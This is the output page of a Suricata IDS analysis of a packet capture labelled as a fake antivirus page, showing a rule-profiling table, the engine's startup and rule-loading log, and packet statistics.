Filename: 2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 24.4300119877 seconds
Hash: ee5317774464e42d2b80588913a48839
Uploaded: 1542805526

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2018-11-21-T-13-05-51-11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap.txt - (37335 bytes)
  --------------------------------------------------------------------------
  Date: 11/21/2018 -- 13:05:51. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2809272      1        1        451450       2.80   16       0        388335      28215.62    0.00        28215.62   
  2        2018342      1        2        302896       1.88   2        0        215126      151448.00   0.00        151448.00  
  3        2826332      1        2        194268       1.20   1        0        194268      194268.00   0.00        194268.00  
  4        2016333      1        4        168791       1.05   1        0        168791      168791.00   0.00        168791.00  
  5        2017166      1        4        154227       0.96   1        0        154227      154227.00   0.00        154227.00  
  6        2826092      1        2        199283       1.23   2        0        120548      99641.50    0.00        99641.50   
  7        2809313      1        2        117314       0.73   1        0        117314      117314.00   0.00        117314.00  
  8        2816910      1        2        312205       1.93   5        0        94935       62441.00    0.00        62441.00   
  9        2017072      1        3        93394        0.58   1        0        93394       93394.00    0.00        93394.00   
  10       2814570      1        4        201712       1.25   3        0        92072       67237.33    0.00        67237.33   
  11       2012325      1        4        87987        0.54   1        1        87987       87987.00    87987.00    0.00       
  12       2814832      1        2        82290        0.51   1        0        82290       82290.00    0.00        82290.00   
  13       2827094      1        2        77733        0.48   1        0        77733       77733.00    0.00        77733.00   
  14       2021267      1        2        156003       0.97   6        0        77367       26000.50    0.00        26000.50   
  15       2807202      1        2        77302        0.48   1        0        77302       77302.00    0.00        77302.00   
  16       2815568      1        2        73572        0.46   1        0        73572       73572.00    0.00        73572.00   
  17       2816909      1        2        313962       1.94   5        0        72418       62792.40    0.00        62792.40   
  18       2816940      1        2        290611       1.80   5        0        70776       58122.20    0.00        58122.20   
  19       2025064      1        5        242772       1.50   5        0        65807       48554.40    0.00        48554.40   
  20       2816928      1        3        205924       1.28   5        0        64734       41184.80    0.00        41184.80   
  21       2821839      1        2        181367       1.12   4        0        63877       45341.75    0.00        45341.75   
  22       2019094      1        5        59618        0.37   1        0        59618       59618.00    0.00        59618.00   
  23       2811399      1        2        59534        0.37   1        0        59534       59534.00    0.00        59534.00   
  24       2023055      1        2        58924        0.36   1        1        58924       58924.00    58924.00    0.00       
  25       2816929      1        4        191953       1.19   5        0        57537       38390.60    0.00        38390.60   
  26       2827062      1        2        55890        0.35   1        1        55890       55890.00    55890.00    0.00       
  27       2816525      1        10       201842       1.25   5        0        55146       40368.40    0.00        40368.40   
  28       2812614      1        2        55020        0.34   1        0        55020       55020.00    0.00        55020.00   
  29       2019230      1        2        74267        0.46   2        0        54857       37133.50    0.00        37133.50   
  30       2815817      1        5        179647       1.11   5        0        54739       35929.40    0.00        35929.40   
  31       2821384      1        2        53461        0.33   1        0        53461       53461.00    0.00        53461.00   
  32       2809850      1        2        52595        0.33   1        0        52595       52595.00    0.00        52595.00   
  33       2021413      1        2        52568        0.33   1        0        52568       52568.00    0.00        52568.00   
  34       2022466      1        5        52376        0.32   1        0        52376       52376.00    0.00        52376.00   
  35       2024845      1        2        51987        0.32   1        0        51987       51987.00    0.00        51987.00   
  36       2810889      1        3        51758        0.32   1        0        51758       51758.00    0.00        51758.00   
  37       2025345      1        2        51376        0.32   1        1        51376       51376.00    51376.00    0.00       
  38       2022901      1        2        51050        0.32   1        0        51050       51050.00    0.00        51050.00   
  39       2022031      1        4        50908        0.32   1        0        50908       50908.00    0.00        50908.00   
  40       2009702      1        5        146684       0.91   8        0        50494       18335.50    0.00        18335.50   
  41       2020979      1        3        50399        0.31   1        0        50399       50399.00    0.00        50399.00   
  42       2015781      1        2        76998        0.48   2        0        50361       38499.00    0.00        38499.00   
  43       2019343      1        3        172064       1.07   5        0        50216       34412.80    0.00        34412.80   
  44       2820851      1        5        216930       1.34   5        0        49444       43386.00    0.00        43386.00   
  45       2814837      1        2        49307        0.31   1        0        49307       49307.00    0.00        49307.00   
  46       2809363      1        3        47848        0.30   1        0        47848       47848.00    0.00        47848.00   
  47       2807970      1        8        47087        0.29   1        0        47087       47087.00    0.00        47087.00   
  48       2823855      1        7        69859        0.43   2        0        47053       34929.50    0.00        34929.50   
  49       2024139      1        2        45811        0.28   1        0        45811       45811.00    0.00        45811.00   
  50       2816927      1        3        197376       1.22   5        0        45034       39475.20    0.00        39475.20   
  51       2022502      1        4        158062       0.98   5        0        44836       31612.40    0.00        31612.40   
  52       2015877      1        6        44756        0.28   1        0        44756       44756.00    0.00        44756.00   
  53       2829394      1        1        186550       1.16   5        0        44736       37310.00    0.00        37310.00   
  54       2014701      1        12       129051       0.80   8        0        44675       16131.38    0.00        16131.38   
  55       2816327      1        4        188113       1.16   5        0        43855       37622.60    0.00        37622.60   
  56       2823169      1        2        43640        0.27   1        0        43640       43640.00    0.00        43640.00   
  57       2814472      1        4        113254       0.70   3        0        43561       37751.33    0.00        37751.33   
  58       2824975      1        2        43061        0.27   1        0        43061       43061.00    0.00        43061.00   
  59       2816924      1        4        148587       0.92   5        0        42646       29717.40    0.00        29717.40   
  60       2016537      1        2        434593       2.69   26       0        42433       16715.12    0.00        16715.12   
  61       2830124      1        1        98482        0.61   3        0        41699       32827.33    0.00        32827.33   
  62       2816930      1        4        145560       0.90   5        0        41659       29112.00    0.00        29112.00   
  63       2024829      1        2        41459        0.26   1        0        41459       41459.00    0.00        41459.00   
  64       2805058      1        3        41332        0.26   1        0        41332       41332.00    0.00        41332.00   
  65       2823663      1        3        63363        0.39   2        0        41201       31681.50    0.00        31681.50   
  66       2821471      1        2        41056        0.25   1        0        41056       41056.00    0.00        41056.00   
  67       2816925      1        3        166219       1.03   5        0        40335       33243.80    0.00        33243.80   
  68       2816922      1        5        154267       0.96   5        0        39813       30853.40    0.00        30853.40   
  69       2829848      1        2        119911       0.74   4        0        39776       29977.75    0.00        29977.75   
  70       2829644      1        1        100714       0.62   3        0        39647       33571.33    0.00        33571.33   
  71       2021418      1        9        39490        0.24   1        0        39490       39490.00    0.00        39490.00   
  72       2016706      1        20       38990        0.24   1        0        38990       38990.00    0.00        38990.00   
  73       2022802      1        2        38333        0.24   1        0        38333       38333.00    0.00        38333.00   
  74       2815886      1        2        75376        0.47   3        0        38263       25125.33    0.00        25125.33   
  75       2811740      1        2        140376       0.87   5        0        37550       28075.20    0.00        28075.20   
  76       2020181      1        8        36666        0.23   1        0        36666       36666.00    0.00        36666.00   
  77       2823858      1        3        36236        0.22   1        0        36236       36236.00    0.00        36236.00   
  78       2012810      1        10       103383       0.64   3        3        36123       34461.00    34461.00    0.00       
  79       2804626      1        9        128204       0.79   5        0        35844       25640.80    0.00        25640.80   
  80       2827279      1        5        119888       0.74   5        0        35690       23977.60    0.00        23977.60   
  81       2815659      1        3        35403        0.22   1        0        35403       35403.00    0.00        35403.00   
  82       2816931      1        3        141923       0.88   5        0        35303       28384.60    0.00        28384.60   
  83       2807793      1        4        35283        0.22   1        0        35283       35283.00    0.00        35283.00   
  84       2024133      1        2        35116        0.22   1        0        35116       35116.00    0.00        35116.00   
  85       2828060      1        4        154111       0.95   5        0        35022       30822.20    0.00        30822.20   
  86       2828986      1        2        118193       0.73   4        0        34989       29548.25    0.00        29548.25   
  87       2819673      1        4        160072       0.99   5        0        34612       32014.40    0.00        32014.40   
  88       2024142      1        2        34593        0.21   1        0        34593       34593.00    0.00        34593.00   
  89       2017948      1        2        33820        0.21   1        0        33820       33820.00    0.00        33820.00   
  90       2024140      1        2        33788        0.21   1        0        33788       33788.00    0.00        33788.00   
  91       2024134      1        2        33240        0.21   1        0        33240       33240.00    0.00        33240.00   
  92       2024137      1        2        33237        0.21   1        0        33237       33237.00    0.00        33237.00   
  93       2017567      1        3        59673        0.37   2        0        33230       29836.50    0.00        29836.50   
  94       2024138      1        2        33027        0.20   1        0        33027       33027.00    0.00        33027.00   
  95       2024141      1        2        33025        0.20   1        0        33025       33025.00    0.00        33025.00   
  96       2830035      1        2        75906        0.47   3        0        32979       25302.00    0.00        25302.00   
  97       2024135      1        2        32880        0.20   1        0        32880       32880.00    0.00        32880.00   
  98       2816526      1        13       147817       0.92   5        0        32701       29563.40    0.00        29563.40   
  99       2024136      1        2        32655        0.20   1        0        32655       32655.00    0.00        32655.00   
  100      2816328      1        5        141014       0.87   5        0        32355       28202.80    0.00        28202.80   
  101      2821615      1        2        143972       0.89   5        0        31555       28794.40    0.00        28794.40   
  102      2020855      1        3        117044       0.72   5        0        30675       23408.80    0.00        23408.80   
  103      2016726      1        6        59243        0.37   2        0        29813       29621.50    0.00        29621.50   
  104      2829393      1        1        138416       0.86   5        0        29785       27683.20    0.00        27683.20   
  105      2022552      1        2        55764        0.35   2        0        29166       27882.00    0.00        27882.00   
  106      2025162      1        2        83980        0.52   3        0        28700       27993.33    0.00        27993.33   
  107      2809511      1        4        28192        0.17   1        0        28192       28192.00    0.00        28192.00   
  108      2017261      1        3        28101        0.17   1        0        28101       28101.00    0.00        28101.00   
  109      2812433      1        2        27774        0.17   1        0        27774       27774.00    0.00        27774.00   
  110      2024771      1        1        27525        0.17   1        0        27525       27525.00    0.00        27525.00   
  111      2821569      1        7        27507        0.17   1        0        27507       27507.00    0.00        27507.00   
  112      2806052      1        3        27351        0.17   1        0        27351       27351.00    0.00        27351.00   
  113      2022147      1        2        27332        0.17   1        0        27332       27332.00    0.00        27332.00   
  114      2816831      1        2        48767        0.30   2        0        27277       24383.50    0.00        24383.50   
  115      2822463      1        2        52957        0.33   2        0        26802       26478.50    0.00        26478.50   
  116      2024606      1        2        26518        0.16   1        0        26518       26518.00    0.00        26518.00   
  117      2017552      1        6        461037       2.85   31       0        26435       14872.16    0.00        14872.16   
  118      2816832      1        2        46233        0.29   2        0        25932       23116.50    0.00        23116.50   
  119      2014967      1        3        25690        0.16   1        0        25690       25690.00    0.00        25690.00   
  120      2816165      1        5        106125       0.66   5        0        25515       21225.00    0.00        21225.00   
  121      2809267      1        8        68752        0.43   3        0        25261       22917.33    0.00        22917.33   
  122      2802990      1        5        64938        0.40   4        0        25202       16234.50    0.00        16234.50   
  123      2022467      1        2        91578        0.57   4        0        25026       22894.50    0.00        22894.50   
  124      2828190      1        2        112701       0.70   5        0        24122       22540.20    0.00        22540.20   
  125      2816895      1        2        

This file has been truncated.


suricata-report-2018-11-21-T-13-05-51-11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap.txt - (17968 bytes)
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/ee5317774464e42d2b80588913a4883956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/11212018.1305-2018-01-06-fake-AV-page-after-viewing-prelatureofayaviri.org.pcap -vvv -k none
elapsedtime:23.425587
stderr:
stdout:
21/11/2018 -- 13:05:27 - <Info> - Configuration node 'rule-files' redefined.
21/11/2018 -- 13:05:27 - <Notice> - This is Suricata version 4.0.0 RELEASE
21/11/2018 -- 13:05:27 - <Info> - CPUs/cores online: 1
21/11/2018 -- 13:05:27 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 32961 and 'request-body-inspect-window' set to 15977 after randomization.
21/11/2018 -- 13:05:27 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33567 and 'response-body-inspect-window' set to 16458 after randomization.
21/11/2018 -- 13:05:27 - <Config> - DNS request flood protection level: 500
21/11/2018 -- 13:05:27 - <Config> - DNS per flow memcap (state-memcap): 524288
21/11/2018 -- 13:05:27 - <Config> - DNS global memcap: 16777216
21/11/2018 -- 13:05:27 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
21/11/2018 -- 13:05:27 - <Config> - preallocated 1000 hosts of size 136
21/11/2018 -- 13:05:27 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
21/11/2018 -- 13:05:27 - <Config> - using magic-file /usr/share/file/magic
21/11/2018 -- 13:05:27 - <Config> - Core dump size is unlimited.
21/11/2018 -- 13:05:27 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
21/11/2018 -- 13:05:27 - <Config> - preallocated 1000 defrag trackers of size 168
21/11/2018 -- 13:05:27 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
21/11/2018 -- 13:05:27 - <Config> - stream "prealloc-sessions": 2048 (per thread)
21/11/2018 -- 13:05:27 - <Config> - stream "memcap": 33554432
21/11/2018 -- 13:05:27 - <Config> - stream "midstream" session pickups: disabled
21/11/2018 -- 13:05:27 - <Config> - stream "async-oneside": disabled
21/11/2018 -- 13:05:27 - <Config> - stream "checksum-validation": disabled
21/11/2018 -- 13:05:27 - <Config> - stream."inline": disabled
21/11/2018 -- 13:05:27 - <Config> - stream "bypass": disabled
21/11/2018 -- 13:05:27 - <Config> - stream "max-synack-queued": 5
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "memcap": 134217728
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "depth": 0
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "toserver-chunk-size": 2676
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "toclient-chunk-size": 2475
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly.raw: enabled
21/11/2018 -- 13:05:27 - <Config> - stream.reassembly "segment-prealloc": 2048
21/11/2018 -- 13:05:27 - <Config> - Delayed detect disabled
21/11/2018 -- 13:05:27 - <Config> - pattern matchers: MPM: ac, SPM: bm
21/11/2018 -- 13:05:27 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
21/11/2018 -- 13:05:27 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
21/11/2018 -- 13:05:27 - <Config> - prefilter engines: MPM
21/11/2018 -- 13:05:27 - <Config> - IP reputation disabled
21/11/2018 -- 13:05:27 - <Perf> - Registered 148 keyword profiling counters.
21/11/2018 -- 13:05:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
21/11/2018 -- 13:05:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
21/11/2018 -- 13:05:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
21/11/2018 -- 13:05:33 - <Config> - No rules loaded from ET-icmp.rules.
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
21/11/2018 -- 13:05:33 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
21/11/2018 -- 13:05:34 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
21/11/2018 -- 13:05:34 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
21/11/2018 -- 13:05:34 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
21/11/2018 -- 13:05:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
21/11/2018 -- 13:05:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
21/11/2018 -- 13:05:36 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
21/11/2018 -- 13:05:38 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
21/11/2018 -- 13:05:39 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
21/11/2018 -- 13:05:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
21/11/2018 -- 13:05:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
21/11/2018 -- 13:05:40 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
21/11/2018 -- 13:05:41 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
21/11/2018 -- 13:05:41 - <Config> - No rules loaded from local.rules.
21/11/2018 -- 13:05:41 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
21/11/2018 -- 13:05:41 - <Info> - Threshold config parsed: 0 rule(s) found
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tcp-packet
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tcp-stream
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for udp-packet
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for other-ip
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_uri
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_request_line
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_client_body
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_response_line
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header_names
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_header_names
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_accept
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_accept_enc
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_accept_lang
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_referer
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_connection
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_len
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_len
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_type
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_content_type
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_start
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_start
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_header
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_method
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_cookie
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_cookie
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_uri
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_user_agent
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_host
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_raw_host
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_stat_msg
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_stat_code
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for dns_query
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_sni
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_cert_issuer
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_cert_subject
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for tls_cert_serial
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for dce_stub_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for dce_stub_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_protocol
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_software
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for ssh_software
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for file_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for file_data
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_request_line
21/11/2018 -- 13:05:42 - <Perf> - using shared mpm ctx' for http_response_line
21/11/2018 -- 13:05:42 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
21/11/2018 -- 13:05:42 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
21/11/2018 -- 13:05:42 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
21/11/2018 -- 13:05:42 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
21/11/2018 -- 13:05:42 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
21/11/2018 -- 13:05:42 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
21/11/2018 -- 13:05:42 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
21/11/2018 -- 13:05:42 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
21/11/2018 -- 13:05:48 - <Perf> - Unique rule groups: 104
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toserver TCP packet": 35
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toclient TCP packet": 17
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toserver TCP stream": 33
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toclient TCP stream": 19
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toserver UDP packet": 27
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "toclient UDP packet": 17
21/11/2018 -- 13:05:48 - <Perf> - Builtin MPM "other IP packet": 3
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_uri": 14
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_request_line": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_client_body": 6
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_response_line": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_header": 10
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_header": 6
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_header_names": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_accept": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_referer": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_content_len": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_content_type": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_content_type": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_protocol": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_start": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_method": 5
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_cookie": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_cookie": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver http_host": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver dns_query": 4
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver tls_sni": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toserver file_data": 1
21/11/2018 -- 13:05:48 - <Perf> - AppLayer MPM "toclient file_data": 7
21/11/2018 -- 13:05:50 - <Perf> - Registered 39590 rule profiling counters.
21/11/2018 -- 13:05:50 - <Info> - fast output device (regular) initialized: alert
21/11/2018 -- 13:05:50 - <Info> - eve-log output device (regular) initialized: eve.json
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'alert'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'http'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'dns'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'tls'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'files'
21/11/2018 -- 13:05:50 - <Config> - enabling 'eve-log' module 'ssh'
21/11/2018 -- 13:05:50 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
21/11/2018 -- 13:05:50 - <Info> - stats output device (regular) initialized: stats.log
21/11/2018 -- 1

This file has been truncated.


packet_stats.log - (12532 bytes)
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       6           106          1139446       73381002      42566453          4.5b   93.07
 IPv4      17             8          6230891       59117207      41976325        335.8m    6.93
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       6           106            68390        6191847        471959         50.0m   84.79
TMM_FLOWWORKER              IPv4      17             8           450979        4240401       1034712          8.3m   14.03
TMM_RECEIVEPCAPFILE         IPv4       6           100             2538           3733          2956        295.6k    0.50
TMM_RECEIVEPCAPFILE         IPv4      17             8             2564          31284          7114         56.9k    0.10
TMM_DECODEPCAPFILE          IPv4       6           100             2652          14261          2932        293.3k    0.50
TMM_DECODEPCAPFILE          IPv4      17             8             2739          27354          6117         48.9k    0.08

Flow Worker            IP ver   Proto   cnt            min            max            avg         
